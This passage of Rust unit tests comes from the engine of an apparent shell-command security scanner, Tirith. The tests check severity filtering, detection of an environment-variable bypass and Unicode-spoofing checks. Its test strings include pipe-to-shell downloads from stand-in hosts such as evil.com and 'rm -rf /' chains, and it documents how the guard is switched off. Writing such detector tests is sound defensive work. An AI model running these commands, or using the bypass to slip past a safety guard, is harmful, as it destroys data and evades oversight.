988        use crate::verdict::{Finding, RuleId, Severity, Timings, Verdict};
989
990        let findings = vec![
991            Finding {
992                // Synthetic Info finding; any rule_id works — we just need one
993                // with Severity::Info for the filter to drop.
994                rule_id: RuleId::NonStandardPort,
995                severity: Severity::Info,
996                title: "info finding".into(),
997                description: String::new(),
998                evidence: vec![],
999                human_view: None,
1000                agent_view: None,
1001                mitre_id: None,
1002                custom_rule_id: None,
1003            },
1004            Finding {
1005                rule_id: RuleId::InvisibleWhitespace,
1006                severity: Severity::Low,
1007                title: "low finding".into(),
1008                description: String::new(),
1009                evidence: vec![],
1010                human_view: None,
1011                agent_view: None,
1012                mitre_id: None,
1013                custom_rule_id: None,
1014            },
1015            Finding {
1016                rule_id: RuleId::HiddenCssContent,
1017                severity: Severity::High,
1018                title: "high finding".into(),
1019                description: String::new(),
1020                evidence: vec![],
1021                human_view: None,
1022                agent_view: None,
1023                mitre_id: None,
1024                custom_rule_id: None,
1025            },
1026        ];
1027
1028        let timings = Timings {
1029            tier0_ms: 0.0,
1030            tier1_ms: 0.0,
1031            tier2_ms: None,
1032            tier3_ms: None,
1033            total_ms: 0.0,
1034        };
1035
1036        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1037        filter_findings_by_paranoia(&mut verdict, 1);
1038        assert_eq!(
1039            verdict.findings.len(),
1040            1,
1041            "paranoia 1 should keep only Medium+"
1042        );
1043        assert_eq!(verdict.findings[0].severity, Severity::High);
1044
1045        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1046        filter_findings_by_paranoia(&mut verdict, 2);
1047        assert_eq!(
1048            verdict.findings.len(),
1049            1,
1050            "paranoia 2 should keep only Medium+"
1051        );
1052    }
1053
1054    #[test]
1055    fn test_inline_bypass_bare_prefix() {
1056        assert!(find_inline_bypass(
1057            "TIRITH=0 curl evil.com",
1058            ShellType::Posix
1059        ));
1060    }
1061
1062    #[test]
1063    fn test_inline_bypass_env_wrapper() {
1064        assert!(find_inline_bypass(
1065            "env TIRITH=0 curl evil.com",
1066            ShellType::Posix
1067        ));
1068    }
1069
1070    #[test]
1071    fn test_inline_bypass_env_i() {
1072        assert!(find_inline_bypass(
1073            "env -i TIRITH=0 curl evil.com",
1074            ShellType::Posix
1075        ));
1076    }
1077
1078    #[test]
1079    fn test_inline_bypass_env_u_skip() {
1080        assert!(find_inline_bypass(
1081            "env -u TIRITH TIRITH=0 curl evil.com",
1082            ShellType::Posix
1083        ));
1084    }
1085
1086    #[test]
1087    fn test_inline_bypass_usr_bin_env() {
1088        assert!(find_inline_bypass(
1089            "/usr/bin/env TIRITH=0 curl evil.com",
1090            ShellType::Posix
1091        ));
1092    }
1093
1094    #[test]
1095    fn test_inline_bypass_env_dashdash() {
1096        assert!(find_inline_bypass(
1097            "env -- TIRITH=0 curl evil.com",
1098            ShellType::Posix
1099        ));
1100    }
1101
1102    #[test]
1103    fn test_no_inline_bypass() {
1104        assert!(!find_inline_bypass(
1105            "curl evil.com | bash",
1106            ShellType::Posix
1107        ));
1108    }
1109
1110    #[test]
1111    fn test_inline_bypass_powershell_env() {
1112        assert!(find_inline_bypass(
1113            "$env:TIRITH=\"0\"; curl evil.com",
1114            ShellType::PowerShell
1115        ));
1116    }
1117
1118    #[test]
1119    fn test_inline_bypass_powershell_env_no_quotes() {
1120        assert!(find_inline_bypass(
1121            "$env:TIRITH=0; curl evil.com",
1122            ShellType::PowerShell
1123        ));
1124    }
1125
1126    #[test]
1127    fn test_inline_bypass_powershell_env_single_quotes() {
1128        assert!(find_inline_bypass(
1129            "$env:TIRITH='0'; curl evil.com",
1130            ShellType::PowerShell
1131        ));
1132    }
1133
1134    #[test]
1135    fn test_inline_bypass_powershell_env_spaced() {
1136        assert!(find_inline_bypass(
1137            "$env:TIRITH = \"0\"; curl evil.com",
1138            ShellType::PowerShell
1139        ));
1140    }
1141
1142    #[test]
1143    fn test_inline_bypass_powershell_mixed_case_env() {
1144        assert!(find_inline_bypass(
1145            "$Env:TIRITH=\"0\"; curl evil.com",
1146            ShellType::PowerShell
1147        ));
1148    }
1149
1150    #[test]
1151    fn test_no_inline_bypass_powershell_wrong_value() {
1152        assert!(!find_inline_bypass(
1153            "$env:TIRITH=\"1\"; curl evil.com",
1154            ShellType::PowerShell
1155        ));
1156    }
1157
1158    #[test]
1159    fn test_no_inline_bypass_powershell_other_var() {
1160        assert!(!find_inline_bypass(
1161            "$env:FOO=\"0\"; curl evil.com",
1162            ShellType::PowerShell
1163        ));
1164    }
1165
1166    #[test]
1167    fn test_no_inline_bypass_powershell_in_posix_mode() {
1168        assert!(!find_inline_bypass(
1169            "$env:TIRITH=\"0\"; curl evil.com",
1170            ShellType::Posix
1171        ));
1172    }
1173
1174    #[test]
1175    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
1176        assert!(!find_inline_bypass(
1177            "curl evil.com # $env:TIRITH=0",
1178            ShellType::PowerShell
1179        ));
1180    }
1181
1182    #[test]
1183    fn test_inline_bypass_env_c_flag() {
1184        // `env -C` takes a directory arg; TIRITH=0 after it must still register.
1185        assert!(find_inline_bypass(
1186            "env -C /tmp TIRITH=0 curl evil.com",
1187            ShellType::Posix
1188        ));
1189    }
1190
1191    #[test]
1192    fn test_inline_bypass_env_s_flag() {
1193        // `env -S` takes a string arg; TIRITH=0 after it must still register.
1194        assert!(find_inline_bypass(
1195            "env -S 'some args' TIRITH=0 curl evil.com",
1196            ShellType::Posix
1197        ));
1198    }
1199
1200    #[test]
1201    fn test_inline_bypass_env_ignore_environment_long_flag() {
1202        assert!(find_inline_bypass(
1203            "env --ignore-environment TIRITH=0 curl evil.com",
1204            ShellType::Posix
1205        ));
1206    }
1207
1208    // Pipe-bypass contract: `TIRITH=0 cmd | interp` is a documented
1209    // whole-pipeline bypass. Pipe stages share an env; sequencing operators
1210    // (`&&`, `||`, `;`, `&`) do not, so bypass must NOT carry across them.
1211
1212    #[test]
1213    fn test_inline_bypass_allows_pipe_to_sh() {
1214        assert!(find_inline_bypass(
1215            "TIRITH=0 curl -L https://something.xyz | bash",
1216            ShellType::Posix
1217        ));
1218    }
1219
1220    #[test]
1221    fn test_inline_bypass_allows_pipe_to_interpreter() {
1222        assert!(find_inline_bypass(
1223            "TIRITH=0 curl -sSL https://install.python-poetry.org | python3 -",
1224            ShellType::Posix
1225        ));
1226    }
1227
1228    #[test]
1229    fn test_inline_bypass_allows_env_wrapper_with_pipe() {
1230        assert!(find_inline_bypass(
1231            "env TIRITH=0 curl https://example.com | bash",
1232            ShellType::Posix
1233        ));
1234    }
1235
1236    #[test]
1237    fn test_inline_bypass_allows_multi_pipe_chain() {
1238        assert!(find_inline_bypass(
1239            "TIRITH=0 curl https://example.com | jq . | bash",
1240            ShellType::Posix
1241        ));
1242    }
1243
1244    #[test]
1245    fn test_inline_bypass_rejects_sequence_with_and_and() {
1246        // `&&` starts a new command with a new env — bypass must NOT apply.
1247        assert!(!find_inline_bypass(
1248            "TIRITH=0 curl https://example.com && rm -rf /",
1249            ShellType::Posix
1250        ));
1251    }
1252
1253    #[test]
1254    fn test_inline_bypass_rejects_semicolon_chain() {
1255        assert!(!find_inline_bypass(
1256            "TIRITH=0 ls ; rm -rf /",
1257            ShellType::Posix
1258        ));
1259    }
1260
1261    #[test]
1262    fn test_inline_bypass_rejects_or_or() {
1263        assert!(!find_inline_bypass(
1264            "TIRITH=0 ls || rm -rf /",
1265            ShellType::Posix
1266        ));
1267    }
1268
1269    #[test]
1270    fn test_inline_bypass_rejects_backgrounding_ampersand() {
1271        // Unquoted `&` forks a background command; bypass must not cover the
1272        // foreground successor.
1273        assert!(!find_inline_bypass(
1274            "TIRITH=0 curl evil.com & bash",
1275            ShellType::Posix
1276        ));
1277    }
1278
1279    #[test]
1280    fn test_inline_bypass_allows_pipe_to_sh_fish() {
1281        // Fish tokenization delegates to POSIX; same pipe-bypass contract applies.
1282        assert!(find_inline_bypass(
1283            "TIRITH=0 curl -L https://example.com | bash",
1284            ShellType::Fish
1285        ));
1286    }
1287
1288    #[test]
1289    fn test_paranoia_filter_recalculates_action() {
1290        use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};
1291
1292        let findings = vec![
1293            Finding {
1294                rule_id: RuleId::InvisibleWhitespace,
1295                severity: Severity::Low,
1296                title: "low finding".into(),
1297                description: String::new(),
1298                evidence: vec![],
1299                human_view: None,
1300                agent_view: None,
1301                mitre_id: None,
1302                custom_rule_id: None,
1303            },
1304            Finding {
1305                rule_id: RuleId::HiddenCssContent,
1306                severity: Severity::Medium,
1307                title: "medium finding".into(),
1308                description: String::new(),
1309                evidence: vec![],
1310                human_view: None,
1311                agent_view: None,
1312                mitre_id: None,
1313                custom_rule_id: None,
1314            },
1315        ];
1316
1317        let timings = Timings {
1318            tier0_ms: 0.0,
1319            tier1_ms: 0.0,
1320            tier2_ms: None,
1321            tier3_ms: None,
1322            total_ms: 0.0,
1323        };
1324
1325        let mut verdict = Verdict::from_findings(findings, 3, timings);
1326        assert_eq!(verdict.action, Action::Warn);
1327
1328        // After paranoia 1: the Low finding is dropped; only the Medium
1329        // remains so the action stays Warn.
1330        filter_findings_by_paranoia(&mut verdict, 1);
1331        assert_eq!(verdict.action, Action::Warn);
1332        assert_eq!(verdict.findings.len(), 1);
1333    }
1334
1335    #[test]
1336    fn test_powershell_bypass_case_insensitive_tirith() {
1337        // PowerShell env vars are case-insensitive.
1338        assert!(find_inline_bypass(
1339            "$env:tirith=\"0\"; curl evil.com",
1340            ShellType::PowerShell
1341        ));
1342        assert!(find_inline_bypass(
1343            "$ENV:Tirith=\"0\"; curl evil.com",
1344            ShellType::PowerShell
1345        ));
1346    }
1347
1348    #[test]
1349    fn test_powershell_bypass_no_panic_on_multibyte() {
1350        // Guards against byte-level slicing on multi-byte UTF-8 after `$`.
1351        assert!(!find_inline_bypass(
1352            "$a\u{1F389}xyz; curl evil.com",
1353            ShellType::PowerShell
1354        ));
1355        assert!(!find_inline_bypass(
1356            "$\u{00E9}nv:TIRITH=0; curl evil.com",
1357            ShellType::PowerShell
1358        ));
1359    }
1360
1361    #[test]
1362    fn test_inline_bypass_single_quoted_value() {
1363        assert!(find_inline_bypass(
1364            "TIRITH='0' curl evil.com",
1365            ShellType::Posix
1366        ));
1367    }
1368
1369    #[test]
1370    fn test_inline_bypass_double_quoted_value() {
1371        assert!(find_inline_bypass(
1372            "TIRITH=\"0\" curl evil.com",
1373            ShellType::Posix
1374        ));
1375    }
1376
1377    // Tirith inspection subcommands (`tirith diff/score/why/receipt/explain`)
1378    // must not trip URL or Unicode-style rules on their own arguments — the
1379    // user typed those arguments specifically to have them inspected.
1380    // `tirith run` and other subcommands stay on the regular analysis path.
1381
1382    #[test]
1383    fn test_tirith_run_still_acts_as_sink() {
1384        // `tirith run` IS a sink; URL-to-sink rules must still fire.
1385        let ctx = exec_ctx("tirith run http://example.com");
1386        let verdict = analyze(&ctx);
1387        assert!(verdict.tier_reached >= 3);
1388        assert!(
1389            verdict
1390                .findings
1391                .iter()
1392                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1393            "tirith run http://... should surface sink findings"
1394        );
1395    }
1396
1397    fn exec_ctx(input: &str) -> AnalysisContext {
1398        AnalysisContext {
1399            input: input.to_string(),
1400            shell: ShellType::Posix,
1401            scan_context: ScanContext::Exec,
1402            raw_bytes: None,
1403            interactive: true,
1404            cwd: None,
1405            file_path: None,
1406            repo_root: None,
1407            is_config_override: false,
1408            clipboard_html: None,
1409        }
1410    }
1411
1412    #[test]
1413    fn test_tirith_inspection_suppresses_url_rules() {
1414        // Cyrillic 'а' inside a URL arg must NOT trip URL-derived findings
1415        // (non_ascii_hostname, mixed_script_in_label, punycode_domain) when
1416        // passed to an inspection subcommand.
1417        for sub in ["diff", "score", "why", "receipt", "explain"] {
1418            let input = format!("tirith {sub} https://ex\u{0430}mple.com");
1419            let verdict = analyze(&exec_ctx(&input));
1420            assert!(
1421                verdict.action == crate::verdict::Action::Allow,
1422                "tirith {sub} with cyrillic URL should allow, got {:?}: {:?}",
1423                verdict.action,
1424                verdict
1425                    .findings
1426                    .iter()
1427                    .map(|f| f.rule_id.to_string())
1428                    .collect::<Vec<_>>()
1429            );
1430        }
1431    }
1432
1433    #[test]
1434    fn test_tirith_inspection_suppresses_confusable_and_bidi() {
1435        // The exec-context byte scan must also respect the inert range so
1436        // ConfusableText / BidiControls / etc. aren't emitted for bytes inside
1437        // the inspection arg span.
1438        let input = "tirith score https://ex\u{0430}mple.com/\u{202E}bar";
1439        let verdict = analyze(&exec_ctx(input));
1440        for f in &verdict.findings {
1441            assert!(
1442                !matches!(
1443                    f.rule_id,
1444                    crate::verdict::RuleId::ConfusableText | crate::verdict::RuleId::BidiControls
1445                ),
1446                "tirith score arg span must not surface {:?}",
1447                f.rule_id
1448            );
1449        }
1450    }
1451
1452    #[test]
1453    fn test_tirith_inspection_with_pipe_still_analyzes_rest() {
1454        // Later pipeline segments must still be analyzed normally.
1455        let ctx = exec_ctx("tirith diff foo | curl http://evil.com/x.sh | sh");
1456        let verdict = analyze(&ctx);
1457        assert!(
1458            verdict
1459                .findings
1460                .iter()
1461                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1462            "later pipe segments must still fire plain_http_to_sink"
1463        );
1464    }
1465
1466    #[test]
1467    fn test_tirith_inspection_with_leading_flag() {
1468        // A flag before the subcommand must not defeat the carveout.
1469        let input = "tirith --quiet diff https://ex\u{0430}mple.com";
1470        let verdict = analyze(&exec_ctx(input));
1471        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1472    }
1473
1474    #[test]
1475    fn test_tirith_doctor_not_on_inert_list() {
1476        // `doctor` is deliberately NOT on the inspection list. Adding any new
1477        // subcommand requires a motivating false-positive fixture.
1478        let input = "tirith doctor https://ex\u{0430}mple.com";
1479        let verdict = analyze(&exec_ctx(input));
1480        assert_ne!(
1481            verdict.action,
1482            crate::verdict::Action::Allow,
1483            "tirith doctor with cyrillic URL SHOULD still flag (not on inert list); \
1484             adding `doctor` to the list requires a motivating false-positive fixture"
1485        );
1486    }
1487
1488    #[test]
1489    fn test_tirith_run_bidi_in_url_still_fires() {
1490        // `tirith run` is a sink (not on the inspection list); bidi in its URL
1491        // arg must still fire.
1492        let input = "tirith run https://evil\u{202E}.com/x.sh";
1493        let verdict = analyze(&exec_ctx(input));
1494        assert!(
1495            verdict
1496                .findings
1497                .iter()
1498                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
1499            "bidi in `tirith run` URL must still fire"
1500        );
1501    }
1502
1503    #[test]
1504    fn test_tirith_inert_arg_range_covers_expected_span() {
1505        let input = "tirith diff https://ex\u{0430}mple.com";
1506        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1507        // "tirith diff" is 11 bytes; arg span starts at byte 11 and runs to end.
1508        assert_eq!(&input[range.clone()], " https://ex\u{0430}mple.com");
1509        assert_eq!(range.end, input.len());
1510    }
1511
1512    #[test]
1513    fn test_tirith_inert_arg_range_none_for_run() {
1514        let range =
1515            extract::tirith_inert_arg_range("tirith run http://example.com", ShellType::Posix);
1516        assert!(range.is_none());
1517    }
1518
1519    #[test]
1520    fn test_tirith_inert_arg_range_none_for_non_tirith() {
1521        assert!(
1522            extract::tirith_inert_arg_range("curl https://example.com", ShellType::Posix).is_none()
1523        );
1524    }
1525
1526    #[test]
1527    fn test_tirith_inert_arg_range_pipe_only_first_segment() {
1528        // Only the first segment is inert; later pipe stages must still analyze.
1529        let input = "tirith diff foo | curl http://evil.com";
1530        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1531        assert!(range.end < input.len());
1532        assert!(!input[range.clone()].contains("curl"));
1533    }
1534
1535    #[test]
1536    fn test_tirith_inspection_suppresses_unicode_tags_evidence_text() {
1537        // UnicodeTags emits Evidence::Text (no byte offset), so an offset-only
1538        // post-filter would leak it. The inert range must therefore be applied
1539        // AT SCAN TIME (inside check_bytes_with_ignore).
1540        let input = "tirith diff https://example.com/\u{E0041}";
1541        let verdict = analyze(&exec_ctx(input));
1542        assert!(
1543            !verdict
1544                .findings
1545                .iter()
1546                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
1547            "UnicodeTags inside tirith diff arg must be suppressed, got findings: {:?}",
1548            verdict
1549                .findings
1550                .iter()
1551                .map(|f| f.rule_id.to_string())
1552                .collect::<Vec<_>>()
1553        );
1554    }
1555
1556    #[test]
1557    fn test_tirith_inspection_unicode_tags_outside_still_fires() {
1558        // A unicode-tag byte before `tirith diff` is outside the inert range
1559        // and must still fire.
1560        let input = "FOO=\u{E0041}\u{E0042} tirith diff safe";
1561        let verdict = analyze(&exec_ctx(input));
1562        assert!(
1563            verdict
1564                .findings
1565                .iter()
1566                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
1567            "UnicodeTags before tirith diff must still fire, got findings: {:?}",
1568            verdict
1569                .findings
1570                .iter()
1571                .map(|f| f.rule_id.to_string())
1572                .collect::<Vec<_>>()
1573        );
1574    }
1575
1576    #[test]
1577    fn test_tirith_inspection_with_sudo_wrapper() {
1578        // `sudo tirith diff URL` — the resolver must see through the sudo
1579        // wrapper to recognize the inspection subcommand.
1580        let input = "sudo tirith diff https://ex\u{0430}mple.com";
1581        let verdict = analyze(&exec_ctx(input));
1582        assert_eq!(
1583            verdict.action,
1584            crate::verdict::Action::Allow,
1585            "sudo tirith diff <cyrillic-url> must be allowed, got {:?}: {:?}",
1586            verdict.action,
1587            verdict
1588                .findings
1589                .iter()
1590                .map(|f| f.rule_id.to_string())
1591                .collect::<Vec<_>>()
1592        );
1593    }
1594
1595    #[test]
1596    fn test_tirith_inspection_with_sudo_u_flag() {
1597        // `sudo -u root` — -u takes a value; the resolver must skip past it.
1598        let input = "sudo -u root tirith diff https://ex\u{0430}mple.com";
1599        let verdict = analyze(&exec_ctx(input));
1600        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1601    }
1602
1603    #[test]
1604    fn test_tirith_inspection_env_assignment_url_still_analyzed() {
1605        // A URL in a leading `FOO=URL` env assignment is OUTSIDE the inspection
1606        // arg span and must still be analyzed.
1607        let input = "FOO=http://evil.com tirith diff safe";
1608        let verdict = analyze(&exec_ctx(input));
1609        // Exact rule behavior for schemeless URLs belongs in the rules layer;
1610        // this test just checks the URL reached the extractor at all.
1611        let urls = verdict.urls_extracted_count.unwrap_or(0);
1612        assert!(
1613            !verdict.findings.is_empty() || urls > 0,
1614            "env-assignment URL must still be extracted/analyzed, got {:?}",
1615            verdict
1616        );
1617    }
1618
1619    #[test]
1620    fn test_tirith_inspection_with_sudo_dash_s_boolean_flag() {
1621        // `-S` is a BOOLEAN sudo flag (read password from stdin). Treating it
1622        // as value-taking would skip `tirith` and resolve `diff` as the
1623        // command word, breaking the carveout.
1624        let input = "sudo -S tirith diff https://ex\u{0430}mple.com";
1625        let verdict = analyze(&exec_ctx(input));
1626        assert_eq!(
1627            verdict.action,
1628            crate::verdict::Action::Allow,
1629            "sudo -S tirith diff must still allow; got {:?}: {:?}",
1630            verdict.action,
1631            verdict
1632                .findings
1633                .iter()
1634                .map(|f| f.rule_id.to_string())
1635                .collect::<Vec<_>>()
1636        );
1637    }
1638
1639    #[test]
1640    fn test_tirith_inspection_with_sudo_dash_a_boolean_flag() {
1641        // Same boolean-flag class as `-S`, for `-A` (askpass).
1642        let input = "sudo -A tirith diff https://ex\u{0430}mple.com";
1643        let verdict = analyze(&exec_ctx(input));
1644        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1645    }
1646
1647    #[test]
1648    fn test_tirith_inspection_with_sudo_dash_b_boolean_flag() {
1649        // Same boolean-flag class as `-S`, for `-B` (ring bell).
1650        let input = "sudo -B tirith diff https://ex\u{0430}mple.com";
1651        let verdict = analyze(&exec_ctx(input));
1652        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1653    }
1654
1655    #[test]
1656    fn test_tirith_inspection_with_doas_wrapper() {
1657        // `doas` is an OpenBSD-flavored sudo alias; same resolver branch.
1658        let input = "doas tirith diff https://ex\u{0430}mple.com";
1659        let verdict = analyze(&exec_ctx(input));
1660        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1661    }
1662
1663    #[test]
1664    fn test_tirith_inert_arg_range_no_false_match_inside_flag_value() {
1665        // A naive substring search would match "diff" inside `--config=diff`.
1666        // The subcommand lookup must require a whitespace word boundary.
1667        let input = "tirith --config=diff diff https://example.com";
1668        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1669        let inert_slice = &input[range.clone()];
1670        assert!(
1671            inert_slice.contains("https://example.com"),
1672            "inert range should cover the URL, got: {inert_slice:?}"
1673        );
1674        assert!(
1675            !inert_slice.contains("diff diff"),
1676            "inert range should not start inside the flag value: {inert_slice:?}"
1677        );
1678    }
1679
1680    #[test]
1681    fn test_cmd_bypass_bare_set() {
1682        assert!(find_inline_bypass(
1683            "set TIRITH=0 & curl evil.com",
1684            ShellType::Cmd
1685        ));
1686    }
1687
1688    #[test]
1689    fn test_cmd_bypass_whole_token_quoted() {
1690        // Whole-token quoting IS a real bypass — the quotes surround the whole
1691        // `TIRITH=0` assignment.
1692        assert!(find_inline_bypass(
1693            "set \"TIRITH=0\" & curl evil.com",
1694            ShellType::Cmd
1695        ));
1696    }
1697
1698    #[test]
1699    fn test_cmd_no_bypass_inner_double_quotes() {
1700        // cmd.exe stores literal `"0"` (quotes included), so `set TIRITH="0"`
1701        // does NOT bypass.
1702        assert!(!find_inline_bypass(
1703            "set TIRITH=\"0\" & curl evil.com",
1704            ShellType::Cmd
1705        ));
1706    }
1707
1708    #[test]
1709    fn test_cmd_no_bypass_single_quotes() {
1710        // Single quotes are literal in cmd.exe (not syntax), so the value is
1711        // `'0'`, not `0`.
1712        assert!(!find_inline_bypass(
1713            "set TIRITH='0' & curl evil.com",
1714            ShellType::Cmd
1715        ));
1716    }
1717
1718    #[test]
1719    fn test_cmd_no_bypass_wrong_value() {
1720        assert!(!find_inline_bypass(
1721            "set TIRITH=1 & curl evil.com",
1722            ShellType::Cmd
1723        ));
1724    }
1725}
tirith_core/engine.rs

tirith_core/
engine.rs